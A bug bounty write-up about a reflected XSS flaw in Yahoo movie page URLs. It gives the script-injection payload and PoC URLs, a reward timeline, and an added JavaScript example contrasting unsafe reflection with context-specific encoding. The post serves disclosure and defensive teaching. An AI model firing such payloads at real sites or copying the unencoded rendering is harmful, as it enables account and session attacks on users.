Reflected XSS in Yahoo!

Shahzada Al Shahriar Khan, Thursday, August 31, 2017

Hello guys, this is Shahzada Al Shahriar Khan, known as TheShahzada.

I am from Bangladesh, and I am a newbie in bug bounty. :P

Well, now I will share how I found a reflected Cross-Site Scripting (XSS) in the main domain and a subdomain of Yahoo.

Vulnerable URLs:
 1. https://www.yahoo.com/movies/film/[*]
 2. https://ca.yahoo.com/movies/film/[*]

Payload I used:
 "><%2fscript><script>alert(document.domain)<%2fscript>

PoC URLs:
 1. https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
 2. https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
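Added example, not part of the original post and not Yahoo's code: the post does not say where the film path segment was reflected, so this sketch assumes a hypothetical template that echoes it into an HTML attribute and an inline script. It shows why the payload's `%2f` passes through path routing, and how encoding each sink for its own context neutralizes it. All function names and the template are assumptions.

```javascript
// Added example. The template, function names and sample path are assumptions.
// Constructed sample: the PoC path as written in the post.
const SAMPLE_PATH = '/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>';

// Routing splits on literal "/" first and decodes each segment afterwards, so
// "%2f" passes through routing and only becomes "/" in the reflected value.
function filmSegment(rawPath) {
  const parts = rawPath.split('/'); // ['', 'movies', 'film', '<segment>']
  if (parts.length !== 4 || parts[1] !== 'movies' || parts[2] !== 'film') return null;
  try {
    return decodeURIComponent(parts[3]);
  } catch (e) {
    return null; // malformed percent-encoding: reject rather than reflect
  }
}

// Weak form: the decoded segment is concatenated into both contexts unencoded.
function renderUnsafe(film) {
  return `<meta property="og:title" content="${film}">\n` +
         `<script>var film = "${film}";</script>`;
}

// HTML text/attribute context: entity-encode the five significant characters.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Inline script context: JSON.stringify quotes the value, then "<", ">", "&" and
// the JS line separators are \u-escaped so "</script>" can never end the block.
function toScriptLiteral(s) {
  return JSON.stringify(s).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened form: same template, each sink encoded for its own context.
function renderSafe(film) {
  return `<meta property="og:title" content="${escapeHtml(film)}">\n` +
         `<script>var film = ${toScriptLiteral(film)};</script>`;
}

const film = filmSegment(SAMPLE_PATH);
console.log(renderUnsafe(film));
console.log(renderSafe(film));
```

A Content-Security-Policy that disallows inline scripts is a useful second layer, but the per-context encoding above is what removes the injection.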

PoC:

[Image: Yahoo Canada subdomain]

Video PoC:

https://youtu.be/QHRbzyIlpkc

Timeline:
 Aug 12th — I Submitted The Report.
 Aug 15th — Triaged The Report & Rewarded Me $300 Initial Bounty.
 Aug 16th — Resolved
 Aug 24th — $400 Bounty Rewarded.

./The_S


Originally published at blog.theshahzada.com on August 31, 2017.